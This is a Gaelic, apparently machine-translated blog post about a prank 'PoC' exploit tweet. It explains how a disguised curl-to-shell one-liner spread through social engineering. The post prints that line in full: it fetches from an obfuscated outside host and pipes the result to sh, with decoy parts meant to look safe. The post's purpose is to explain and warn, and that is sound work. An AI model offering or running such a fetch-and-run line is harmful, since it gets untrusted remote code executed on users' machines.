Thoir an aire. eadar-theangachadh.:
TL; DR: Na cleachd pìoban faidhle ann an sh no bash ann an suidheachadh sam bith. Is e dòigh mhath a tha seo airson smachd a chall air a’ choimpiutair agad.
Tha mi airson sgeulachd ghoirid a cho-roinn riut mu dheidhinn brath PoC èibhinn a chaidh a chruthachadh air 31 Cèitean. Nochd e gu sgiobalta mar fhreagairt do naidheachdan bho
Às deidh dhomh crìoch a chuir air obair air dòigh obfuscation ùr ann an curl, thug mi iomradh air an tweet tùsail agus “leig mi a-mach PoC obrach" anns an robh aon loidhne de chòd a tha, a rèir coltais, a’ gabhail brath air an so-leòntachd a chaidh a lorg. Gu dearbh, b 'e neòlas iomlan a bha seo. Bha mi a’ gabhail ris gum bithinn fosgailte sa bhad, agus gum faigheadh mi retweets no dhà (oh uill).
Ach, cha b’ urrainn dhomh smaoineachadh dè thachair an ath rud. Bha fèill mhòr air an tweet agam. Gu iongantach, aig an àm seo (15:00 àm Moscow 1 Ògmhios) chan eil mòran dhaoine air faighinn a-mach gur e meallta a tha seo. Bidh mòran dhaoine ga ath-sgrìobhadh gun a bhith ga sgrùdadh idir (gun luaidh air a bhith a’ coimhead air na grafaigean àlainn ASCII a bheir e a-mach).
Dìreach seall cho breagha sa tha e!
Ged a tha na lùban agus na dathan sin uile sgoinneil, tha e soilleir gum feumadh daoine còd a ruith air an inneal aca airson am faicinn. Gu fortanach, bidh brobhsairean ag obair san aon dòigh, agus còmhla ris an fhìrinn nach robh mi dha-rìribh ag iarraidh a dhol a-steach do dhuilgheadas laghail, bha an còd a chaidh a thiodhlacadh air an làrach agam dìreach a’ dèanamh gairmean mac-talla gun a bhith a’ feuchainn ri còd a bharrachd a chuir a-steach no a chuir an gnìomh.
Sgaradh beag:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Innleadaireachd sòisio-dealanach (SEE) - barrachd air dìreach phishing
Bha sàbhailteachd agus eòlas na phrìomh phàirt den deuchainn seo. Tha mi a’ smaoineachadh gur iad sin a thug air a shoirbheachadh. Bha an loidhne-àithne gu soilleir a’ ciallachadh tèarainteachd le bhith a’ toirt iomradh air “127.0.0.1” (an localhost ainmeil). Thathas den bheachd gu bheil Localhost tèarainte agus cha bhith an dàta air a ’fàgail do choimpiutair gu bràth.
B’ e eòlas an dàrna prìomh phàirt SEE den deuchainn. Leis gu robh an luchd-èisteachd cuimsichte gu sònraichte a’ toirt a-steach daoine a bha eòlach air bunaitean tèarainteachd coimpiutair, bha e cudromach còd a chruthachadh gus am biodh e coltach gu robh pàirtean dheth eòlach agus eòlach (agus mar sin sàbhailte). Tha e air leth soirbheachail a bhith ag iasad eileamaidean de sheann bhun-bheachdan brathaidh agus gan cur còmhla ann an dòigh neo-àbhaisteach.
Gu h-ìosal tha mion-sgrùdadh mionaideach air an aon-loidhne. Bidh a h-uile dad air an liosta seo a’ caitheamh nàdar cosmaigeach, agus cha mhòr nach eil feum air dad airson a ghnìomhachd fhèin.
Dè na co-phàirtean a tha dha-rìribh riatanach? Seo -gsS
, -O 0x0238f06a
, |sh
agus am frithealaiche lìn fhèin. Cha robh stiùireadh droch-rùnach sam bith air an fhrithealaiche lìn, ach dìreach thug e seirbheis do ghrafaigean ASCII a’ cleachdadh òrdughan echo
anns an sgriobtar a tha ann an index.html
. Nuair a chuir an neach-cleachdaidh a-steach loidhne le |sh
anns a 'mheadhan, index.html
air a luchdachadh agus air a chuir gu bàs. Gu fortanach, cha robh droch rùn aig luchd-gleidhidh an fhrithealaiche lìn.
-
../../../%00
- a 'riochdachadh a' dol seachad air an eòlaire; -
ngx_stream_module.so
- slighe gu modal NGINX air thuaiream; -
/bin/sh%00<'protocol:TCP'
- tha còir againn a chuir air bhog/bin/sh
air an inneal targaid agus ath-stiùireadh an toradh chun t-sianal TCP; -
-O 0x0238f06a#PLToffset
- tàthchuid dìomhair, air a chur ris#PLToffset
, a bhith a’ coimhead mar chothromachadh cuimhne ann an dòigh air choireigin anns a’ PLT; -
|sh;
- criomag chudromach eile. Dh'fheumadh sinn an toradh ath-stiùireadh gu sh / bash gus an còd a chuir an gnìomh a thàinig bhon t-seirbheisiche lìn ionnsaigh a tha suidhichte aig0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy anns a bheil netcat a 'toirt iomradh/dev/tcp/localhost
gus am bi a h-uile dad a’ coimhead sàbhailte a-rithist. Gu dearbh, chan eil e a 'dèanamh dad agus tha e air a ghabhail a-steach san loidhne airson bòidhchead.
Tha seo a’ crìochnachadh dì-chòdachadh an sgriobt aon-loidhne agus an deasbad air taobhan de “innleadaireachd sòisio-dealanach” (phishing toinnte).
Rèiteachadh frithealaiche lìn agus frith-bheartan
Leis gur e infosec/hackers a th’ anns a’ mhòr-chuid de na fo-sgrìobhaichean agam, chuir mi romham am frithealaiche lìn a dhèanamh beagan nas seasmhaiche ri abairtean de “ùidh” às an leth, dìreach gus am biodh rudeigin aig na balaich ri dhèanamh (agus bhiodh e spòrsail Suidhich). Chan eil mi a’ dol a liostadh na duilgheadasan gu lèir an seo leis gu bheil an deuchainn fhathast a ’dol, ach seo beagan rudan a bhios am frithealaiche a’ dèanamh:
- A’ cumail sùil ghnìomhach air oidhirpean cuairteachaidh air lìonraidhean sòisealta sònraichte agus a’ cur grunn òrdagan ro-shealladh an àite gus an neach-cleachdaidh a bhrosnachadh gus cliogadh air a’ cheangal.
- Ag ath-stiùireadh Chrome/Mozilla/Safari/etc gu bhidio brosnachaidh Thugcrowd an àite a bhith a’ sealltainn an sgriobt shligean.
- Freiceadan airson comharran FOILLSEACHADH de shàrachadh / sgrùdadh soilleir, agus an uairsin a’ tòiseachadh ag ath-stiùireadh iarrtasan gu frithealaichean NSA (ha!).
- A ’stàladh Trojan, a bharrachd air rootkit BIOS, air a h-uile coimpiutair a bhios an luchd-cleachdaidh a’ tadhal air an òstair bho bhrobhsair àbhaisteach (dìreach a ’magadh!).
Pàirt bheag de antimers
Anns a 'chùis seo, b' e an aon amas a bh 'agam a bhith a' maighstireachd cuid de fheartan Apache - gu sònraichte, na riaghailtean fionnar airson ath-stiùireadh iarrtasan - agus smaoinich mi: carson?
Cleachd NGINX (fìor!)
Subscribe to
Source: www.habr.com